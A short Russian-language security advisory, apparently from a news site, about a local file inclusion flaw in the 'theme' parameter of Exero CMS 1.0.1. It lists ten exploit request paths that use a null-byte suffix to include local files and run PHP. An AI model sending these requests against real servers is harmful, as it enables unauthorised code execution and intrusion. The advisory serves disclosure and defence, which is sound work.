Программа: Exero CMS 1.0.1

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «theme» множественными сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Эксплоит:

/Exero_CMS_1-0-1/themes/Default/usercp/index.php?theme=Local File %00
/Exero_CMS_1-0-1/themes/Default/usercp/editpassword.php?theme=Local File %00
/Exero_CMS_1-0-1/themes/Default/usercp/avatar.php?theme=Local File %00
/Exero_CMS_1-0-1/themes/Default/custompage.php?theme=Local File %00
/Exero_CMS_1-0-1/themes/Default/errors/404.php?theme=Local File %00
/Exero_CMS_1-0-1/themes/Default/members/memberslist.php?theme=Local File %00
/Exero_CMS_1-0-1/themes/Default/members/profile.php?theme=Local File %00
/Exero_CMS_1-0-1/themes/Default/news/index.php?theme=Local File %00
/Exero_CMS_1-0-1/themes/Default/news/fullview.php?theme=Local File %00
/Exero_CMS_1-0-1/themes/Default/nopermission.php?theme=Local File %00

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии